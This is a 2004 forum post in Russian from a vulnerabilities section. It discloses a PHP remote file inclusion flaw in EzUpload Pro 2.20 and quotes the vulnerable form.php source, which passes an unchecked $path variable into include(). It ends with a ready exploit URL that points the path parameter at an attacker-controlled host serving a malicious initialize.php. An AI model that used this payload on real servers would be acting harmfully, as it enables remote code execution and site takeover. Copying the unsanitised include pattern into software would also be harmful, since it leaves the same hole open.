Php-injection: ezupload pro v2.20

Discussion in 'Уязвимости' started by zFailure, 20 Sep 2004.

  1. zFailure

    zFailure Elder - Старейшина

    Joined:
    6 Jun 2004
    Messages:
    163
    Likes Received:
    24
    Reputations:
    24
    http:// target/EzUpload_dir/form.php
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><?
    /////////////////////////////////////////////////////////////
    // Program Name &nbsp; &nbsp; &nbsp; &nbsp; : EzUpload Pro &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;
    // Program Version &nbsp; &nbsp; &nbsp;: 2.20 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;
    // Program Author &nbsp; &nbsp; &nbsp; : ScriptsCenter.com &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;
    // Supplied by &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;: CyKuH [WTN] &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;
    // Nullified and tested : CyKuH [WTN] &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;
    // Distribution &nbsp; &nbsp; &nbsp; &nbsp; : via WebForum and Forums File Dumps
    // &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;WTN Team `2004
    /////////////////////////////////////////////////////////////
    &nbsp;if( !isset($path) ) $path = "";
    &nbsp;include( $path . "initialize.php" );
    ...[/QUOTE]<span id='postcolor'>

    http:// haker/initialize.php

    http:// target/EzUpload_dir/form.php?path=http://haker.ru/